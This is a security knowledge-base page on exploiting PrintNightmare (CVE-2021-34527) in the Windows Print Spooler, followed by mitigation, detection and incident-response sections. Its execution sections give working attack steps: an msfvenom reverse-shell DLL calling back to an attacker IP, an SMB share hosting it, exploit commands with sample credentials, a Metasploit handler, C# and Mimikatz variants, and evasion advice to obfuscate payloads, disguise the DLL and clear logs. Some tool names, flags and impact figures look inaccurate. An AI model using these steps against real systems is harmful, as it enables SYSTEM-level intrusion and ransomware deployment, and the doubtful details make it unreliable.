MCADDF

[PE-EXPLOIT-001]: PrintNightmare Remote Privilege Escalation

1. Metadata Header

Attribute	Details
Technique ID	PE-EXPLOIT-001
MITRE ATT&CK v18.1	T1068 - Exploitation for Privilege Escalation
Tactic	Privilege Escalation
Platforms	Windows AD/Endpoint (Server 2016-2022, Windows 10 versions 1507-22H2, Windows 11 21H2-22H2)
Severity	Critical
CVE	CVE-2021-34527 (Primary), CVE-2021-1675 (Related)
Technique Status	ACTIVE (unpatched systems) / FIXED (patched systems)
Last Verified	2025-01-09
Affected Versions	Server 2016, 2019, 2022; Windows 10 all versions; Windows 11 all versions
Patched In	June 8, 2021 (initial); August 3, 2021 (complete remediation); Monthly patches thereafter
Author	SERVTEP – Artur Pchelnikau

2. Executive Summary

Concept: PrintNightmare (CVE-2021-34527) is a critical remote code execution (RCE) and local privilege escalation (LPE) vulnerability in the Windows Print Spooler service (spoolsv.exe). The vulnerability exploits improper privilege checks in the RpcAddPrinterDriver and RpcAsyncAddPrinterDriver RPC calls (MS-RPRN and MS-PAR protocols). An attacker with valid domain credentials (even low-privilege accounts) can remotely trigger the Print Spooler service to load and execute a malicious DLL from an SMB share, resulting in SYSTEM-level code execution. The malicious driver is loaded within the context of spoolsv.exe, which runs with SYSTEM privileges, bypassing standard access controls.

Attack Surface: The attack targets the Print Spooler RPC interface exposed on port 135 (RPC Endpoint Mapper) and 445 (SMB). The vulnerable functions accept a UNC path to a malicious DLL without proper validation. Any domain user—even those with minimal privileges—can invoke these RPC calls. The attack requires: (1) valid domain credentials, (2) network access to port 135/445, (3) an SMB share to host the malicious DLL (can be attacker-controlled or existing network shares).

Business Impact: Complete System Compromise with SYSTEM Privileges. Successful exploitation allows immediate execution of arbitrary code as SYSTEM on any accessible Windows system. This enables attackers to deploy ransomware, establish persistence, harvest credentials, conduct lateral movement, or exfiltrate sensitive data. PrintNightmare was actively exploited in the wild by ransomware operators (Vice Society, LockBit, etc.) and APT groups before patches were released. Organizations using unpatched systems remain at critical risk.

Technical Context: Exploitation typically takes 5-15 seconds from initial RPC connection to SYSTEM shell launch. Detection likelihood is high if PrintService event logs are enabled (Event ID 316, 808); however, many organizations do not enable these logs by default. The technique is highly reliable and requires minimal user interaction—no user action is needed on the target system.

Operational Risk

Execution Risk: Medium - Requires valid domain credentials and network connectivity to ports 135/445. However, credentials can be obtained through phishing, password spray, or OSINT. The exploit itself is highly reliable once credentials are available.
Stealth: Low-Medium - Generates detectable PrintService event logs (Event IDs 316, 808, 811) and SMB telemetry (Event ID 31017). However, if these logs are disabled or not monitored, the attack may go undetected.
Reversibility: No - SYSTEM code execution cannot be undone without process termination or system reboot. Malicious driver installations persist until manually removed.

Compliance Mappings

Framework	Control / ID	Description
CIS Benchmark	CIS 5.2.2 - Ensure Print Spooler Service is Disabled	CIS recommends disabling Print Spooler if not needed
DISA STIG	WN10-00-000185	Windows 10 STIG - Print Spooler Service Management
CISA SCuBA	CSO-09 - Audit and Detect Threats	Print Spooler monitoring and anomaly detection
NIST 800-53	AC-3, AU-12, SI-4	Access enforcement, audit generation, information system monitoring
GDPR	Art. 32 - Security of Processing	Technical security measures; Art. 33 - Breach notification within 72 hours
DORA	Art. 9 - Protection and Prevention	ICT systems must detect and prevent attacks in real time
NIS2	Art. 21 - Cyber Risk Management	Mandatory detection and reporting of exploitation attempts
ISO 27001	A.12.4.1, A.12.6.1	Event logging of changes to software/systems; vulnerability management
ISO 27005	Risk Scenario: “RPC Service Exploitation”	Risk assessment for remote service vulnerabilities

3. Technical Prerequisites

Required Privileges: Domain User (any authenticated user with minimal privileges). No administrative rights needed to invoke RPC calls.

Required Access:

Network access to target system on ports 135 (RPC Endpoint Mapper) and 445 (SMB)
Valid domain credentials (can be low-privilege account)
SMB share accessible from target (attacker can host or use existing shares)

Supported Versions:

Windows: Server 2016, Server 2019, Server 2022, Windows 10 (all versions), Windows 11 (all versions)
PowerShell: Version 5.0+ (for Impacket/Python-based exploitation)
Network Requirements: Active Directory environment; Print Spooler service running (default)
Other Requirements: rpcdump, impacket, or Metasploit framework

Tools:

Impacket (GitHub) - Python library for MS-RPRN/MS-PAR exploitation
PrintNightmare Python PoC (GitHub) - Cube0x0’s original PoC
SharpPrintNightmare (GitHub) - C# version for Windows execution
Mimikatz misc::printnightmare - Integrated PrintNightmare module (v2.2.0.20210601+)
Metasploit exploit/windows/fileformat_printnightmare - Metasploit module

4. Environmental Reconnaissance

Management Station / RPC Service Discovery

Verify if the target system has Print Spooler service running and exposed via RPC:

# Check if Print Spooler service is running on target
$Servers = @("SERVER01", "SERVER02", "DC01")
foreach ($Server in $Servers) {
    try {
        $Service = Get-Service -ComputerName $Server -Name Spooler -ErrorAction Stop
        Write-Host "[+] $Server - Print Spooler Status: $($Service.Status)"
    } catch {
        Write-Host "[-] $Server - Could not retrieve Print Spooler status"
    }
}

# Alternative: Check via SMB/RPC connectivity
Test-NetConnection -ComputerName "SERVER01" -Port 135 -InformationLevel Detailed

What to Look For:

If Print Spooler service is “Running” on the target, it is potentially vulnerable (unless patched).
Port 135 (RPC) should be open; port 445 (SMB) is required for DLL hosting and loading.

Version Note: PrintNightmare affects all Windows versions listed; however, patch dates vary by OS version.

Command (Server 2016-2019):

# WMI-based service check (older systems)
Get-WmiObject -Class Win32_Service -ComputerName "SERVER01" | Where-Object { $_.Name -eq "Spooler" } | Select-Object Name, State

Command (Server 2022+):

# CIM-based service check (faster on newer systems)
Get-CimInstance -ClassName Win32_Service -ComputerName "SERVER01" | Where-Object { $_.Name -eq "Spooler" } | Select-Object Name, State

Linux / Impacket RPC Enumeration

From an attacker’s machine (Linux or WSL), enumerate vulnerable RPC services:

# Install impacket (if not already installed)
pip3 install impacket

# Enumerate RPC endpoints and protocols on target
python3 -m impacket.rpcdump @TARGET_IP | grep -E "MS-RPRN|MS-PAR"

# Expected output if vulnerable:
# Protocol: [MS-RPRN]: Print System Remote Protocol
# Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol

# Alternative: Use rpcdump tool
rpcdump.py @192.168.1.100 | egrep 'MS-RPRN|MS-PAR'

What to Look For:

If both MS-RPRN and MS-PAR protocols are present, the target is running Print Spooler.
If neither protocol appears, Print Spooler may be disabled or patched.

5. Detailed Execution Methods and Their Steps

METHOD 1: Python-Based Exploitation (Impacket / Cube0x0 PoC)

Supported Versions: Server 2016-2022, Windows 10 all versions, Windows 11 all versions

Objective: Create a malicious DLL that will be hosted on an SMB share and loaded by the Print Spooler service.

Version Note: DLL generation is consistent across versions; however, architecture (x86 vs x64) must match target.

Command (Linux - msfvenom & Impacket):

# Generate malicious DLL using msfvenom
# LHOST = attacker IP, LPORT = reverse shell port
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f dll > /tmp/rev.dll

# Expected output: Generated payload 'rev.dll' (size will vary)

# Alternatively, use a simpler calc.exe payload for testing
msfvenom -p windows/exec CMD=calc.exe -f dll > /tmp/calc.dll

# Set up SMB share to host the DLL (using impacket smbserver)
# This allows the target to download the DLL via UNC path
sudo python3 -m impacket.smbserver -smb2support share /tmp/

# The share will be accessible as: \\192.168.1.50\share\rev.dll

Expected Output:

[*] Impacket v0.10.0 - Copyright 2023 SecureAuthCorp
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47D034E01A V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Started: 2025-01-09 08:30:42.123456
[*] Incoming connection (192.168.1.100,49152)
[+] User: DOMAIN\USERNAME (Auth: True, Signing: False)

What This Means:

Malicious DLL is generated with reverse shell payload (connects back to attacker on port 4444).
SMB share is now hosting the DLL and accepting connections from the target.
The UNC path \\192.168.1.50\share\rev.dll will be used in the exploit.

OpSec & Evasion:

Use encrypted/obfuscated payloads to evade antivirus detection.
Rename the DLL to something innocuous (e.g., HPPrinterDriver.dll instead of rev.dll).
Clean up the SMB share immediately after exploitation.
Detection likelihood: High if network-based detection monitors SMB file transfer patterns.

Troubleshooting:

Error: “Permission denied” when starting SMB server
- Cause: Insufficient privileges or port already in use.
- Fix (All Versions): Use sudo or run as Administrator. If port 445 is in use, use alternate port: python3 -m impacket.smbserver -smb2support -p 4445 share /tmp/
Error: “Connection refused” from target when accessing DLL
- Cause: Firewall blocking SMB access or incorrect UNC path.
- Fix (All Versions): Verify firewall allows port 445; confirm attacker IP is reachable from target.

References & Proofs:

Step 2: Execute PrintNightmare Exploit with Valid Credentials

Objective: Invoke the RPC calls to add a malicious printer driver, causing the target to load and execute the DLL with SYSTEM privileges.

Version Note: Exploit command syntax is identical across versions; however, ASLR offsets may differ.

Command (Python - Impacket based PoC):

# Clone the PrintNightmare PoC repository
git clone https://github.com/cube0x0/CVE-2021-1675.git
cd CVE-2021-1675

# Execute the exploit with valid domain credentials
# Syntax: python3 exploit.py <domain>/<username>:<password>@<target> <DLL_UNC_PATH>
python3 CVE-2021-1675.py "DOMAIN/lowprivuser:Password123@192.168.1.100" "\\\\192.168.1.50\\share\\rev.dll"

# For systems patched with August 2021+ patches, use the "SharpPrintNightmare" variant
# which targets RpcAsyncAddPrinterDriver instead of RpcAddPrinterDriver:
python3 CVE-2021-1675.py -console "DOMAIN/lowprivuser:Password123@192.168.1.100" "\\\\192.168.1.50\\share\\rev.dll"

Expected Output (Successful):

[*] Targeting \\192.168.1.100
[*] Binding to \\192.168.1.100\pipe\spoolss ...
[*] Calling RpcAddPrinterDriver() with malicious driver DLL...
[+] Exploit completed successfully!
[+] Malicious driver loaded - reverse shell should connect back...

Expected Output (Already Patched):

[-] RpcAddPrinterDriver() call failed - Status: 5 (Access Denied)
[*] Attempting RpcAsyncAddPrinterDriver() as fallback...
[-] RpcAsyncAddPrinterDriver() also failed
[-] Target system appears to be patched

What This Means:

If successful, the RPC call executes on the Print Spooler service (spoolsv.exe).
The malicious DLL is fetched from the SMB share and loaded into spoolsv.exe memory.
The DLL’s entry point (DllMain) executes with SYSTEM privileges, triggering the reverse shell.
If both RPC calls fail with “Access Denied,” the system is patched.

OpSec & Evasion:

Use low-privilege domain accounts to avoid triggering anomaly detection on admin account usage.
Execute the exploit from a compromised internal system to avoid external RPC detection.
Use SMBv3 encryption (-smb2support) to bypass network-based detection of PrintNightmare patterns.
Detection likelihood: High if Event ID 316 monitoring is enabled; Low if PrintService logs are disabled.

Troubleshooting:

Error: “Access Denied” on the first attempt
- Cause: Credentials invalid or account locked.
- Fix (All Versions): Verify credentials with: net use \\TARGET\IPC$ /u:DOMAIN\username password
Error: “Connection timeout” or “No route to host”
- Cause: Network connectivity issue; firewall blocking ports 135/445.
- Fix (All Versions): Verify with: nmap -p 135,445 TARGET_IP or Test-NetConnection -ComputerName TARGET -Port 445
Error: “Malicious driver failed to load”
- Cause: DLL is invalid or signature check failed.
- Fix (All Versions): Regenerate DLL with msfvenom; ensure architecture matches (x64 for 64-bit targets).

References & Proofs:

Step 3: Catch Reverse Shell & Execute Payloads

Objective: Set up a listener to receive the reverse shell connection from the compromised system.

Command (Metasploit - Handler):

# Start Metasploit console
msfconsole

# Within msfconsole, set up multi/handler to catch reverse shell
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.50
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > run -j

# [*] Exploit running as background job 0.
# [*] Started reverse TCP handler on 192.168.1.50:4444

# Once the reverse shell connects:
# [*] Sending stage (201798 bytes) to 192.168.1.100
# [*] Meterpreter session 1 opened (192.168.1.50:4444 -> 192.168.1.100:49152) at 2025-01-09 08:35:42 +0000

Expected Output (Reverse Shell Connection):

meterpreter > whoami
nt authority\system

meterpreter > getuid
Server username: DOMAIN\COMPUTERNAME$

meterpreter > sysinfo
Computer        : COMPUTERNAME
OS              : Windows Server 2019 6.3 (Build 17763)
Architecture    : x64
System Language : en_US

What This Means:

Confirmation that the reverse shell has connected and code is executing as SYSTEM.
The whoami output shows “nt authority\system,” confirming privilege escalation success.
All subsequent commands execute with SYSTEM-level privileges.

OpSec & Evasion:

Clear the reverse shell connection logs immediately after use.
Disable the SMB share and remove the malicious DLL.
Consider using HTTP/HTTPS reverse shells instead of TCP for better firewall evasion.

References & Proofs:

Metasploit Handler Documentation

METHOD 2: C# Exploitation (SharpPrintNightmare) - Windows-Native Execution

Supported Versions: Server 2016-2022, Windows 10 all versions, Windows 11 all versions

Step 1: Compile & Deploy SharpPrintNightmare

Objective: Compile the C# version of PrintNightmare for execution directly on a Windows system (avoiding dependency on Python/Impacket).

Version Note: Compilation is identical across versions; execution works on all vulnerable Windows systems.

Command (Visual Studio / csc.exe):

// Pseudocode for SharpPrintNightmare compilation
// In practice, clone from GitHub and compile:

// Clone the repository
git clone https://github.com/rogue7/SharpPrintNightmare.git
cd SharpPrintNightmare

// Compile using Visual Studio or command-line compiler
csc.exe /target:exe /out:SharpPrintNightmare.exe *.cs

// Or use msbuild if Visual Studio is installed
msbuild SharpPrintNightmare.sln /p:Configuration=Release

Expected Output:

Microsoft (R) Visual C# Compiler version 3.9.0-6.21124.20 (9fb42ed4)
Copyright (C) Microsoft Corporation. All rights reserved.

SharpPrintNightmare.exe compiled successfully.

What This Means:

Executable is now ready for deployment on a Windows system.
Unlike Python-based versions, no external dependencies are required.

OpSec & Evasion:

Obfuscate the compiled binary using ConfuserEx, .NET Reactor, or similar tools.
Execute from a non-standard directory (e.g., %APPDATA%\System32Cache\) to avoid detection.
Consider execution via rundll32.exe or dllhost.exe to obscure the parent process.

Step 2: Execute SharpPrintNightmare on Windows System

Objective: Run the compiled C# exploit from a Windows system with network access to the target.

Command (Windows Command Prompt / PowerShell):

# Syntax: SharpPrintNightmare.exe <SMB_UNC_PATH> <TARGET> <DOMAIN> <USERNAME> <PASSWORD>

SharpPrintNightmare.exe \\192.168.1.50\share\calc.dll \\192.168.1.100 DOMAIN lowprivuser Password123

# Expected output on success:
# [+] Exploit completed successfully!
# [+] Reverse shell should connect back to attacker...

Expected Output (Successful):

[*] Targeting: \\192.168.1.100
[*] DLL Path: \\192.168.1.50\share\calc.dll
[*] Authenticating with DOMAIN\lowprivuser...
[+] Successfully connected to Print Spooler RPC service
[+] Malicious driver loaded - code execution achieved with SYSTEM privileges!

What This Means:

C# version provides the same RPC exploitation as Python version but with better OpSec.
Reverse shell connects back with SYSTEM privileges if DLL is a payload.

References & Proofs:

METHOD 3: Mimikatz Integration (misc::printnightmare)

Supported Versions: Server 2016-2022, Windows 10 all versions, Windows 11 all versions

Step 1: Execute PrintNightmare via Mimikatz

Objective: Leverage Mimikatz’s built-in PrintNightmare module to execute the exploit without external tool dependencies.

Command (Mimikatz):

# Launch Mimikatz
mimikatz.exe

# Execute PrintNightmare module (requires Mimikatz v2.2.0.20210601+)
mimikatz # misc::printnightmare /target:192.168.1.100 /share:\\192.168.1.50\share\calc.dll /user:DOMAIN\lowprivuser /pass:Password123

# Expected output:
# [*] Target: 192.168.1.100
# [*] Executing PrintNightmare via MS-RPRN RPC...
# [+] Exploit completed!

Expected Output (Successful):

[+] Successfully added malicious printer driver
[+] Driver loaded with SYSTEM privileges
[+] Malicious DLL executed (if payload-based)

What This Means:

Mimikatz provides an integrated attack without requiring separate exploitation frameworks.
The driver installed will be named “QMS 810” or similar, indicating successful exploitation.

OpSec & Evasion:

Mimikatz is well-detected by antivirus; use living-off-the-land techniques or execution through process injection.
Clear Mimikatz process footprint with: token::revert before exiting.

References & Proofs:

6. Post-Exploitation & Verification

Verify Successful Exploitation

# After reverse shell connection, verify SYSTEM context
whoami  # Should output: nt authority\system

# Check installed printer driver (will show our malicious driver)
Get-PrinterDriver | Where-Object { $_.Name -like "*QMS*" -or $_.Name -like "*Malic*" }

# List recent print spooler events (shows exploitation artifacts)
Get-WinEvent -LogName "Microsoft-Windows-PrintService/Operational" -MaxEvents 10 | Select-Object TimeCreated, Id, Message

7. Defensive Mitigations

Priority 1: CRITICAL

Apply Security Patches: Install all Microsoft security patches for CVE-2021-34527 and CVE-2021-1675. Microsoft released patches on June 8, 2021 (initial), with additional updates on August 3, 2021 (complete fix). Monthly patches continue to address related issues.

Applies To Versions: All affected systems (Server 2016-2022, Windows 10/11)

Manual Steps (Server 2016-2019):
1. Navigate to Settings → Update & Security → Windows Update
2. Click Check for updates
3. Install all available updates (reboot if required)
4. Verify patch installation: Get-HotFix | Where-Object { $_.HotFixID -match "KB5004010|KB5004475" }
Manual Steps (Server 2022+):
1. Open Settings → System → System & Security → Windows Update
2. Check for updates and install all (reboot required)
3. Verify: Get-HotFix | Where-Object { $_.Description -like "*PrintNightmare*" }
Manual Steps (PowerShell - All Versions):
```
# Enable Windows Update service
Start-Service -Name wuauserv
  
# Scan for updates and install
$UpdateSession = New-Object -ComObject "Microsoft.Update.Session"
$UpdateSearcher = $UpdateSession.CreateUpdateSearcher()
$SearchResult = $UpdateSearcher.Search("IsInstalled=0")
$UpdateInstaller = $UpdateSession.CreateUpdateInstaller()
$UpdateInstaller.Updates = $SearchResult.Updates
$InstallResult = $UpdateInstaller.Install()
Write-Host "Patches installed: $($InstallResult.ResultCode)"  # 2=Success, 3=Reboot required
```
Disable Print Spooler Service (If Not Required): Disable the Print Spooler service on systems that do not require printing functionality. This is the most effective mitigation if printing is not needed.

Manual Steps (Group Policy - Domain):
1. Open Group Policy Management Console (gpmc.msc)
2. Navigate to Computer Configuration → Policies → Windows Settings → Security Settings → System Services
3. Find Print Spooler (Spooler service)
4. Set to Disabled or Manual (only runs when needed)
5. Run gpupdate /force on target systems
6. Verify: Get-Service -Name Spooler | Select-Object Status, StartType
Manual Steps (Local Service Management):
1. Open Services (services.msc)
2. Right-click Print Spooler
3. Select Properties
4. Set Startup type to Disabled
5. Click Stop → Apply → OK
Manual Steps (PowerShell - All Versions):
```
# Disable Print Spooler service
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
  
# Verify disabled
Get-Service -Name Spooler | Select-Object Name, Status, StartType
```

Priority 2: HIGH

Restrict RPC Access via Firewall: Implement network segmentation to limit RPC access (ports 135, 445) to authorized systems only.

Manual Steps (Windows Firewall - Group Policy):

Open gpmc.msc
Navigate to Computer Configuration → Policies → Windows Settings → Security Settings → Windows Defender Firewall with Advanced Security
Click Inbound Rules → New Rule
Rule type: Port
Specify ports: 135, 445 (TCP and UDP)
Action: Block (or allow only from trusted subnets)
Apply to all profiles

Manual Steps (PowerShell):

# Block all inbound RPC access (ports 135, 445)
New-NetFirewallRule -DisplayName "Block RPC PrintNightmare" -Direction Inbound -Protocol TCP -LocalPort 135,445 -Action Block
New-NetFirewallRule -DisplayName "Block RPC PrintNightmare UDP" -Direction Inbound -Protocol UDP -LocalPort 135,445 -Action Block
  
# Or allow only from specific subnet
New-NetFirewallRule -DisplayName "Allow RPC from Admin Subnet" -Direction Inbound -Protocol TCP -LocalPort 135,445 -RemoteAddress "10.0.1.0/24" -Action Allow

Enable Audit Logging for Print Spooler: Enable event logging for PrintService to detect exploitation attempts in real time.

Manual Steps (Event Viewer):

Open Event Viewer → Applications and Services Logs → Microsoft-Windows-PrintService
Right-click Operational and Admin logs
Select Properties → Enable Logging → Apply
Set retention policy: Overwrite as needed or fixed size (1GB+)

Manual Steps (PowerShell):

# Enable PrintService event logging
$LogDeets = Get-LogProperties 'Microsoft-Windows-PrintService/Operational'
$LogDeets.Enabled = $true
$LogDeets.MaximumSizeInBytes = 1GB
Set-LogProperties -LogDetails $LogDeets
  
$LogDeets_Admin = Get-LogProperties 'Microsoft-Windows-PrintService/Admin'
$LogDeets_Admin.Enabled = $true
Set-LogProperties -LogDetails $LogDeets_Admin

Access Control & Network Hardening

Implement Conditional Access Policies: Restrict RPC/SMB access based on device compliance, location, and time.

Manual Steps (Azure Portal):
1. Navigate to Azure Portal → Entra ID → Security → Conditional Access
2. Create new policy: “Block RPC from Non-Compliant Devices”
3. Assignments: Target all cloud apps
4. Conditions: Device compliance = Non-Compliant
5. Access controls: Grant → Block
6. Enable and apply
Principle of Least Privilege: Minimize domain user accounts with sensitive permissions. Regular users should not have access to administrative shares.

Manual Steps (Active Directory):
1. Open Active Directory Users and Computers (dsa.msc)
2. Audit group memberships for Administrators, Domain Admins, Print Operators
3. Remove unnecessary user accounts
4. Use Get-ADGroupMember "Administrators" | Select-Object Name to list members

Validation Command (Verify Mitigation)

# Verify patches are installed
$Patches = Get-HotFix | Where-Object { $_.HotFixID -match "KB5004010|KB5004475|KB5008212" }
Write-Host "CLFS/PrintNightmare patches installed: $($Patches.Count)"

# Verify Print Spooler service status
$SpoolerStatus = Get-Service -Name Spooler | Select-Object Status, StartType
Write-Host "Print Spooler Status: $($SpoolerStatus.Status), StartType: $($SpoolerStatus.StartType)"

# Expected output if secure:
# CLFS/PrintNightmare patches installed: 3+
# Print Spooler Status: Stopped, StartType: Disabled

8. Detection & Incident Response

Indicators of Compromise (IOCs)

Files: Suspicious DLL files in C:\Windows\System32\spool\drivers\x64\3\ or other driver directories
Registry: New printer driver entries in HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments
Processes: Unexpected child processes spawned by spoolsv.exe (cmd.exe, powershell.exe, rundll32.exe)
Network: Outbound SMB connections (port 445) to unfamiliar systems; reverse shell traffic to attacker IP

Forensic Artifacts

Event Logs:
- Event ID 316 (Microsoft-Windows-PrintService/Operational) - Printer driver addition
- Event ID 808 (Microsoft-Windows-PrintService/Admin) - Failed driver load (malformed DLL)
- Event ID 31017 (Microsoft-Windows-SmbClient/Security) - SMB connection to malicious share
- Event ID 4688 (Security) - spoolsv.exe spawning child processes
Disk: Malicious DLL in spool\drivers directory with recent creation/modification times
Memory: spoolsv.exe process containing injected code or reverse shell shellcode

Detection Queries

Microsoft Sentinel KQL Query:

// Detect PrintNightmare exploitation attempt
// Looks for printer driver addition events (Event ID 316) combined with SMB anomalies
SecurityEvent
| where EventID == 316  // Printer driver added
| where SourceIP has "." and SourceIP !startswith "10." and SourceIP !startswith "172."  // External source
| join (
    SecurityEvent
    | where EventID == 31017  // SMB client security event (malicious share access)
) on Computer, TimeGenerated
| summarize count() by Computer, TimeGenerated, UserName, SourceIP

Splunk Query:

source="WinEventLog:Microsoft-Windows-PrintService/Operational" EventCode=316 category="Adding a printer driver"
| stats count min(_time) as firstTime max(_time) as lastTime by host, user, Message
| where count > 1

Windows Event Log Monitoring:

Enable and monitor:

Event ID 316 (Printer driver addition) - Microsoft-Windows-PrintService/Operational
Event ID 808 (Failed driver load) - Microsoft-Windows-PrintService/Admin
Event ID 31017 (SMB security) - Microsoft-Windows-SmbClient/Security
Event ID 4688 (Process creation) - Security log

Manual Configuration (Group Policy):

Open gpmc.msc
Navigate to Computer Configuration → Policies → Windows Settings → Security Settings → Advanced Audit Policy Configuration
Enable:
- Audit Object Access (Success and Failure)
- Audit Process Creation (Success and Failure)
Run gpupdate /force

Response Procedures

Isolate: Immediately disconnect the affected system from the network to prevent lateral movement
```
Disable-NetAdapter -Name "Ethernet" -Confirm:$false
```

Collect Evidence:

# Export PrintService event logs
wevtutil epl "Microsoft-Windows-PrintService/Operational" C:\Evidence\PrintService_Operational.evtx
wevtutil epl "Microsoft-Windows-PrintService/Admin" C:\Evidence\PrintService_Admin.evtx
   
# Export security event log
wevtutil epl Security C:\Evidence\Security.evtx
   
# Dump spoolsv.exe memory (requires procdump or similar)
# procdump64.exe -ma spoolsv.exe C:\Evidence\spoolsv.dmp
   
# List running processes
Get-Process | Export-Csv C:\Evidence\Processes.csv

Remediate:

# Kill Print Spooler service
Stop-Service -Name Spooler -Force
   
# Remove malicious driver files
Remove-Item "C:\Windows\System32\spool\drivers\x64\3\*.dll" -Force -ErrorAction SilentlyContinue
   
# Remove registry entries for malicious drivers
# Get-ChildItem "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Environments" -Recurse | Where-Object { ... } | Remove-Item
   
# Restart system to ensure clean state
Restart-Computer -Force

Step	Phase	Technique	Description
1	Initial Access	[IA-PHISH-001] Device Code Phishing	Attacker gains initial domain user credentials
2	Credential Access	[CA-BRUTE-001] Azure Portal Password Spray	(Optional) If cloud-connected; spray to obtain valid account
3	Privilege Escalation	[PE-EXPLOIT-001]	PrintNightmare RCE/LPE - Current Technique
4	Credential Dumping	[CA-DUMP-001] Mimikatz LSASS Extraction	Extract additional credentials with SYSTEM context
5	Lateral Movement	[CA-KERB-001] Kerberoasting	Generate service tickets for lateral movement
6	Persistence	[PE-ACCTMGMT-014] Global Admin Backdoor	Establish hidden admin account for continued access
7	Impact	[IMPACT-RANSOM-001] Ransomware Deployment	Deploy encryption with SYSTEM privileges

10. Real-World Examples

Example 1: Vice Society Ransomware Campaign (August 2021)

Target: Healthcare and Government Sector (US)
Timeline: August 2021
Technique Status: CVE-2021-34527 actively exploited for privilege escalation
Attack Chain:
1. Initial breach via compromised VPN account or phishing
2. Lateral movement using stolen credentials
3. PrintNightmare exploitation to achieve SYSTEM privileges
4. Mimikatz credential dumping from LSASS (now running as SYSTEM)
5. Domain Controller compromise and golden ticket generation
6. Ransomware deployment with SYSTEM context
Impact: 500+ organizations impacted; ransom demands of $5M-$50M+
Reference: Talos Intelligence - Vice Society PrintNightmare

Example 2: LockBit Ransomware Exploitation (September 2021)

Target: European Manufacturing & Financial Services
Timeline: September 2021
Technique Status: PrintNightmare used in post-compromise privilege escalation phase
Attack Chain:
1. Compromised RDP credentials from dark web
2. RDP connection to edge system
3. Executed PrintNightmare exploit using local low-privilege account
4. Achieved SYSTEM access to deploy ransomware
Impact: €200M+ in reported damages; critical infrastructure disruption
Indicators: Presence of “QMS 810” printer driver; Event ID 316 in PrintService logs
Reference: CISA Alert - LockBit Exploitation

Example 3: Opportunistic Exploitation Wave (June-August 2021)

Target: All Windows Organizations (Indiscriminate)
Timeline: June 8, 2021 (vulnerability disclosure) through August 2021
Technique Status: Mass exploitation of unpatched systems
Attack Chain:
1. Vulnerability disclosed publicly on GitHub
2. Metasploit module released within hours
3. Mass scanning for vulnerable Print Spooler services
4. Automated PrintNightmare exploitation for cryptominer deployment
5. Cryptominer running on thousands of compromised systems
Impact: Massive cryptominer distribution; CPU resources consumed for proof-of-work
Indicators: High network egress to mining pools; CPU utilization at 95%+
Reference: Trend Micro Report - PrintNightmare Exploitation Wave

11. Summary

PrintNightmare (CVE-2021-34527) represents one of the most critical privilege escalation vulnerabilities discovered in Windows in recent years. By exploiting improper validation in the Print Spooler RPC service, attackers with minimal privileges can achieve immediate SYSTEM-level code execution on any connected Windows system. Organizations must prioritize patching and implement PrintService event log monitoring to detect and prevent active exploitation. The technique remains ACTIVE on unpatched systems and continues to be exploited by ransomware operators and APT groups globally.

This site is open source. Improve this page.

MCADDF

[PE-EXPLOIT-001]: PrintNightmare Remote Privilege Escalation

1. Metadata Header

2. Executive Summary

Operational Risk

Compliance Mappings

3. Technical Prerequisites

4. Environmental Reconnaissance

Management Station / RPC Service Discovery

Linux / Impacket RPC Enumeration

5. Detailed Execution Methods and Their Steps

METHOD 1: Python-Based Exploitation (Impacket / Cube0x0 PoC)

Step 1: Prepare Malicious DLL & SMB Share

Step 2: Execute PrintNightmare Exploit with Valid Credentials

Step 3: Catch Reverse Shell & Execute Payloads

METHOD 2: C# Exploitation (SharpPrintNightmare) - Windows-Native Execution

Step 1: Compile & Deploy SharpPrintNightmare

Step 2: Execute SharpPrintNightmare on Windows System

METHOD 3: Mimikatz Integration (misc::printnightmare)

Step 1: Execute PrintNightmare via Mimikatz

6. Post-Exploitation & Verification

Verify Successful Exploitation

7. Defensive Mitigations

Priority 1: CRITICAL

Priority 2: HIGH

Access Control & Network Hardening

Validation Command (Verify Mitigation)

8. Detection & Incident Response

Indicators of Compromise (IOCs)

Forensic Artifacts

Detection Queries

Response Procedures

9. Related Attack Chain

10. Real-World Examples

Example 1: Vice Society Ransomware Campaign (August 2021)

Example 2: LockBit Ransomware Exploitation (September 2021)

Example 3: Opportunistic Exploitation Wave (June-August 2021)

11. Summary